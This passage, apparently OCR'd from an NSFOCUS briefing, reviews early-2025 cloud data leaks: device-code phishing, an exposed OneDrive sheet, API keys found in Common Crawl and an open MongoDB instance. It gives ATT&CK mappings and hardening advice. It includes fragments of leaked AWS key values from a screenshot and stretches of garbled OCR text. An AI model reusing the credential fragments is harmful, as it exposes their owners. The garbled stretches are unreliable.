(guò)構(gòu)造釣魚(yú)郵件進(jìn)行社工攻擊。T1204用戶執(zhí)行.001惡意鏈接受害者通過(guò)點(diǎn)擊郵件中的惡意鏈接，訪問(wèn)攻擊者精心構(gòu)造的仿冒系統(tǒng)，從而拿到微軟身份驗(yàn)證后返回的Token信息。T1534內(nèi)部魚(yú)叉式釣魚(yú)攻擊N/A攻擊者通過(guò)Microsoft365賬戶的Token訪問(wèn)賬戶下的微軟服務(wù)，從而進(jìn)行數(shù)據(jù)竊取等惡意行為。T1567通過(guò)Web服務(wù)外泄N/A攻擊者可能利用Web服務(wù)進(jìn)行數(shù)據(jù)竊取。參考鏈接：https://wwW./blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication//en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/事件八：印度尼西亞共和國(guó)銀行使用的微軟云盤Onedrive暴露泄露規(guī)模：泄露了印度尼西亞多地銀行分行客戶的財(cái)務(wù)信息事件回顧：2025年2月，綠盟科技創(chuàng)新研究院發(fā)現(xiàn)一個(gè)OneDrive的在線excel文檔中泄露了印度尼西亞多地銀行分行客戶的詳細(xì)財(cái)務(wù)信息：包括賬戶號(hào)碼、欠款余額、逾期天數(shù)、業(yè)務(wù)類型等，暴露了客戶的貸款信息。這類數(shù)據(jù)泄露可能會(huì)影響客戶的金融狀況和個(gè)人信用。SUs圖17.疑似Onedrive泄露數(shù)據(jù)事件分析：OneDrive是微軟推出的云存儲(chǔ)服務(wù)，允許用戶存儲(chǔ)、同步和共享文件。它提供個(gè)人、企業(yè)級(jí)云存儲(chǔ)空間，可自動(dòng)同步Windows、Mac、1OS、Android等設(shè)備上的文件，集成了MicrosoftOffice文檔，可以無(wú)縫協(xié)作、在線編輯。并且可以通過(guò)鏈接共享文件，可設(shè)置訪問(wèn)權(quán)限：任何人、僅限組織中已具備訪問(wèn)權(quán)限的人或使用姓名、組織或電子郵件與組織內(nèi)部或外部的特定人員共享，還可進(jìn)一步設(shè)置操作權(quán)限(僅查看、可編輯)。導(dǎo)致此次數(shù)據(jù)泄露事件的主要原因是在共享文件時(shí)錯(cuò)誤地將訪問(wèn)權(quán)限設(shè)置為與任何人共享，這樣任何人只要知道該分享鏈接，則無(wú)需登錄也可訪問(wèn)到該文件內(nèi)容。因此在對(duì)一些含有較敏感數(shù)據(jù)的文件進(jìn)行共享時(shí)，要注意訪問(wèn)權(quán)限的設(shè)置，避免敏感信息的泄露。VERIZON事件分類：MiscellaneousErrors(雜項(xiàng)錯(cuò)誤)所用MITREATT&CK技術(shù)：技術(shù)子技術(shù)利用方式T1593搜索開(kāi)放網(wǎng)站/域.002搜素引擎攻擊者可能利用網(wǎng)絡(luò)空間搜索引擎進(jìn)行情報(bào)收集。T1133外部遠(yuǎn)程服務(wù)N/A攻擊者識(shí)別暴露服務(wù)中的微軟云盤(OneDrive)T1587開(kāi)發(fā)功能.004利用工具攻擊者開(kāi)發(fā)對(duì)暴露服務(wù)進(jìn)行安全測(cè)試的工具。T1530云存儲(chǔ)中的數(shù)據(jù)N/A攻擊者訪問(wèn)微軟云盤(OneDrive)的數(shù)據(jù)。T1567通過(guò)Web服務(wù)外泄N/A攻擊者可能利用Web服務(wù)進(jìn)行數(shù)據(jù)竊取。中泄露約12000個(gè)2025年2月28日泄露規(guī)模：約11,908個(gè)有效的DeepSeekAPI密鑰、憑證和身份驗(yàn)證令牌事件回顧：Truffle安全團(tuán)隊(duì)利用開(kāi)源工具TruffleHog對(duì)爬蟲(chóng)數(shù)據(jù)庫(kù)——CommonCrawl中2024年12月的400TB數(shù)據(jù)(涵蓋來(lái)自4750萬(wàn)臺(tái)主機(jī)的26.7億個(gè)網(wǎng)頁(yè))進(jìn)行了掃描。掃描結(jié)果表明：約11,908個(gè)有效的DeepSeekAPI密鑰、憑證和<input<inputtype="hidden"name<inputtype="hidden"name="aWSAccessKeyId"value="AKIAJKL<inputtype="hidden"name="secretAccessKey"value="Kpb1Q<inputtype="hidden"name="associateTag"value="<inputtype="hidden"name="version"value="2010-09-01"<inputtype="hidden"name="responseGroup"value="Small,<inputtype="hidden"name="amazonI約1,500個(gè)MailchimpAPI密鑰被直接硬編碼在JavaScript代碼中。Mailchimp事件分析：CommonCrawl是知名的非盈利網(wǎng)絡(luò)爬蟲(chóng)數(shù)據(jù)庫(kù)，定期抓取并公開(kāi)互聯(lián)網(wǎng)網(wǎng)頁(yè)數(shù)據(jù)。CommonCrawl中存儲(chǔ)于90,000個(gè)WARC(WebARChive)文件中，完整保存了爬取網(wǎng)站的原始HTML、JavaScript代碼及服務(wù)器響應(yīng)內(nèi)容。CommonCrawl中的數(shù)據(jù)集常被用來(lái)進(jìn)行AI模型的訓(xùn)練。因此，Truffle安全團(tuán)隊(duì)的研究?jī)?nèi)容揭示了一個(gè)日益嚴(yán)重的問(wèn)題：使用帶有漏洞的語(yǔ)料庫(kù)進(jìn)行模型訓(xùn)練會(huì)使得模型繼承其存在安全漏洞。即使DeepSeek等其他大模型在訓(xùn)練和應(yīng)用過(guò)程中利用了額外的安全措施，但訓(xùn)練語(yǔ)料庫(kù)中的硬編碼漏洞的普遍存在會(huì)使大模型認(rèn)為這種“不安全”的做法是正常的。除此之外，硬編碼這種不安全的編碼風(fēng)格是一個(gè)老生常談的問(wèn)題。這種漏洞的成因很簡(jiǎn)單，也很普遍，但帶來(lái)的風(fēng)險(xiǎn)確實(shí)十分嚴(yán)重的。硬編碼漏洞會(huì)造成數(shù)據(jù)泄露、服務(wù)中斷、供應(yīng)鏈攻擊等。在大模型技術(shù)快速發(fā)展的今天，憑證的泄露會(huì)帶來(lái)一種新型攻擊——LLM劫持。LLM劫持攻擊指攻擊者利用竊取的云憑證，針對(duì)云托管的LLM服務(wù)發(fā)起的劫持攻擊。攻擊者利用OAI反向代理和竊取到的云憑證，將受害者訂閱的云托管LLM服務(wù)的訪問(wèn)權(quán)限進(jìn)行出售。該攻擊可能導(dǎo)致受害者承受巨額的云服務(wù)成本。技術(shù)子技術(shù)利用方式T1596搜索開(kāi)放技術(shù)數(shù)據(jù)庫(kù).005掃描數(shù)據(jù)庫(kù)攻擊者在公開(kāi)爬蟲(chóng)數(shù)據(jù)庫(kù)中進(jìn)行信息收集。T1588獲取能力.002工具攻擊者部署敏感信息發(fā)現(xiàn)工具。T1586泄露賬戶.003云賬戶攻擊者利用敏感信息發(fā)現(xiàn)工具發(fā)現(xiàn)公開(kāi)數(shù)據(jù)庫(kù)中的敏感憑證類信息。T1090代理.002外部代理攻擊者利用OAI反向代理軟件集中管理多個(gè)LLM賬戶的訪問(wèn)。T1496資源劫持N/A攻擊者利用訪問(wèn)LLM注入攻擊進(jìn)行LLM資源劫持。事件十：Daytrip使用的Mongo數(shù)據(jù)庫(kù)服務(wù)因配置錯(cuò)誤配置導(dǎo)致超過(guò)47萬(wàn)用戶旅行數(shù)據(jù)泄露2025年1月28日泄露規(guī)模：超過(guò)470K用戶記錄以及762K的詳細(xì)旅行訂單。2024年10月21日，Cybernews團(tuán)隊(duì)發(fā)現(xiàn)Daytrip使用的Mongo數(shù)據(jù)庫(kù)泄露了用戶旅行記錄信息，包括姓名、PayPal電子郵件、電子郵件、電話號(hào)碼、出生日期、部分付款詳情、賬單信息、取車和還車地址、乘客詳細(xì)信息、費(fèi)用、VIP標(biāo)志等信息。2024年10月21日，Cybernews將此安全問(wèn)題通知至Daytrip,Daytrip聲稱管理該Mongo數(shù)據(jù)庫(kù)的為其供應(yīng)商；2024年10月24日，Daytrip通知其供應(yīng)商并關(guān)閉了Mongo數(shù)據(jù)庫(kù)的對(duì)外2025年1月28日，Cybernews公開(kāi)了整個(gè)事件。事件分析：Daytrip為國(guó)際旅客提供車輛租賃服務(wù)。該公司目前在120多個(gè)國(guó)家開(kāi)展業(yè)務(wù)，并計(jì)劃向全球擴(kuò)張。MongoDB是一種面向文檔的數(shù)據(jù)庫(kù)系統(tǒng)，廣泛用于處理非結(jié)構(gòu)化數(shù)據(jù)。MongoDB社區(qū)版的默認(rèn)配置不會(huì)啟用訪問(wèn)控制和身份驗(yàn)證機(jī)制，這意味著數(shù)據(jù)庫(kù)在安裝后，如果沒(méi)有進(jìn)一步進(jìn)行安全配置，數(shù)據(jù)庫(kù)里的數(shù)據(jù)將公開(kāi)給所有可以訪問(wèn)的人。導(dǎo)致此次數(shù)據(jù)泄露事件的主要原因是服務(wù)配置錯(cuò)誤，包括：·未設(shè)置訪問(wèn)控制列表(ACL),使得任何人可以通過(guò)公開(kāi)的IP地址訪問(wèn)。●未啟用認(rèn)證機(jī)制，使得任何可以訪問(wèn)數(shù)據(jù)庫(kù)的人可以操作數(shù)據(jù)庫(kù)中的數(shù)據(jù)。這些配置錯(cuò)誤讓攻擊者能夠輕松使用掃描工具發(fā)現(xiàn)并訪問(wèn)未保護(hù)的數(shù)據(jù)庫(kù)實(shí)例，從而竊取其中的敏感信息。全球1-2月云上數(shù)據(jù)泄露典型事件解讀"passwordHash""lastName":"otherPhoneNum""profilePhoto":nu"mangopayInformation":[{]圖19.疑似Mongo數(shù)據(jù)庫(kù)信息泄露所用MITREATT&CK技術(shù)：技術(shù)子技術(shù)利用方式T1593搜索開(kāi)放網(wǎng)站/域.002搜索引擎攻擊者可能利用網(wǎng)絡(luò)空間搜索引擎進(jìn)行情報(bào)收集。T1133外部遠(yuǎn)程服務(wù)N/A攻擊者識(shí)別暴露服務(wù)中的MongoDB服務(wù)。T1587開(kāi)發(fā)功能.004利用工具攻擊者開(kāi)發(fā)對(duì)MongoDB服務(wù)進(jìn)行安全測(cè)試的工具。T1530云存儲(chǔ)中的數(shù)據(jù)N/A攻擊者訪問(wèn)MongoDB服務(wù)的數(shù)據(jù)。T1567通過(guò)Web服務(wù)外泄N/A攻擊者可能利用Web服務(wù)進(jìn)行數(shù)據(jù)竊取。參考鏈接：/s安全建議前文我們對(duì)全球1-2月云上數(shù)據(jù)泄露典型事件進(jìn)行了詳細(xì)解讀，如下圖所示，從事件分類模式上看，雜項(xiàng)錯(cuò)誤中涵蓋的配置錯(cuò)誤是導(dǎo)致數(shù)據(jù)泄露的主要原因，占比高達(dá)60%。導(dǎo)致的數(shù)據(jù)泄露，社工類占比約20%,剩余Web基礎(chǔ)類攻擊和系統(tǒng)入侵各占比10%。云數(shù)據(jù)泄露事件類型分布圖20.云數(shù)據(jù)泄露事件類型分布2.1針對(duì)雜項(xiàng)錯(cuò)誤類的安全建議1.通過(guò)配置防火墻、訪問(wèn)控制列表(ACL)、角色訪問(wèn)控制(RBAC)或者服務(wù)監(jiān)聽(tīng)策略等方式縮小服務(wù)暴露范圍。例如通過(guò)配置bindlp參數(shù)，限制MongoDB只監(jiān)聽(tīng)特定的私有網(wǎng)絡(luò)地址。如圖121所示，在mongod.conf中設(shè)置：netnet:bindIp:,#僅允許本地和指定IP訪問(wèn)圖21.MongoDB監(jiān)聽(tīng)配置2.禁止服務(wù)匿名訪問(wèn)策略，如修改mongod.conf文件的"authorization"為"enabled",禁止MongoDB匿名訪問(wèn)；3.避免將對(duì)象存儲(chǔ)服務(wù)的訪問(wèn)控制權(quán)限設(shè)置為公共訪問(wèn)，或開(kāi)啟云服務(wù)商提供的類似“阻止公共訪問(wèn)”等功能。*NSFOCUS|全球云上數(shù)據(jù)泄露風(fēng)險(xiǎn)分析簡(jiǎn)報(bào)(第五期)et/華北2(北京)收通使用權(quán)陽(yáng)檢制文州警確定開(kāi)啟吧止公共訪問(wèn)?變件樹(shù)表超讓公驚六全業(yè)對(duì)05回原行集對(duì)●開(kāi)公井示開(kāi)產(chǎn)止公開(kāi)，時(shí)網(wǎng)態(tài)墻口有的公天讀開(kāi)濱和士南公開(kāi)居周涯的項(xiàng)需塔dos),開(kāi)不北所建認(rèn)e正號(hào)力不理公地動(dòng)同的業(yè)隔。在它需理公地動(dòng)同.請(qǐng)加開(kāi)常見(jiàn)問(wèn)攀.讀寫奶限癥開(kāi)上開(kāi)右習(xí)，人以開(kāi)止公共石rl5施題頻確認(rèn)開(kāi)B止公開(kāi)站同生開(kāi)止公井買納網(wǎng)刺u能然不C蛇圖22.配置對(duì)象存儲(chǔ)為私有訪問(wèn)4.監(jiān)控和記錄所有訪問(wèn)請(qǐng)求，并配置異常活動(dòng)告警。如公有云服務(wù)可直接開(kāi)啟云審計(jì)和告警服務(wù)，例如，使用awscloudtrail服務(wù)、阿里云審計(jì)日志服務(wù)等。5.通過(guò)配置防火墻、訪問(wèn)控制列表(ACL)、角色訪問(wèn)控制(RBAC)或者服務(wù)監(jiān)聽(tīng)策略等方式縮小服務(wù)暴露范圍。6.通過(guò)設(shè)置微軟Onedrive的分享鏈接為”僅限已經(jīng)具有訪問(wèn)權(quán)限的人“訪問(wèn)避免文件被公開(kāi)鏈接設(shè)置我的筆記本鏈接適用于任何人與組織中已具有訪問(wèn)權(quán)限的人員重新共享。僅限已經(jīng)具有訪問(wèn)權(quán)限的人①W你選擇的人使用姓名、組或電子郵件與你在你的組織內(nèi)部或外部選擇的特定人員共享。◎更多設(shè)置可編輯應(yīng)用應(yīng)用圖23.微軟云盤文件分享權(quán)限設(shè)置2.2針對(duì)系統(tǒng)入侵的安全建議1.設(shè)置網(wǎng)絡(luò)隔離策略，如根據(jù)資產(chǎn)或業(yè)務(wù)設(shè)置多個(gè)微分段網(wǎng)絡(luò)，針對(duì)每個(gè)微分段設(shè)置白名單放行規(guī)則等；2.啟用多因素身份驗(yàn)證(MFA),增強(qiáng)高敏感系統(tǒng)和數(shù)據(jù)的訪問(wèn)控制；定期輪換服務(wù)賬戶的訪問(wèn)密鑰和API密鑰，并及時(shí)撤銷不再使用的密鑰?？衫迷茝S商的密鑰管理服務(wù)(KeyManagementServiceKMS);3.實(shí)施集中憑證管理，防止憑證泄露。如使用AWSSecretsManager或4.定期為員工提供云安全培訓(xùn)，內(nèi)容涵蓋配置管理、數(shù)據(jù)保護(hù)、憑證管理、安全監(jiān)控和應(yīng)急響應(yīng)，提升開(kāi)發(fā)人員的安全意識(shí)，確保運(yùn)維人員能夠快速應(yīng)對(duì)泄露事件；5.自動(dòng)撤銷離職員工對(duì)系統(tǒng)的訪問(wèn)權(quán)限，包括云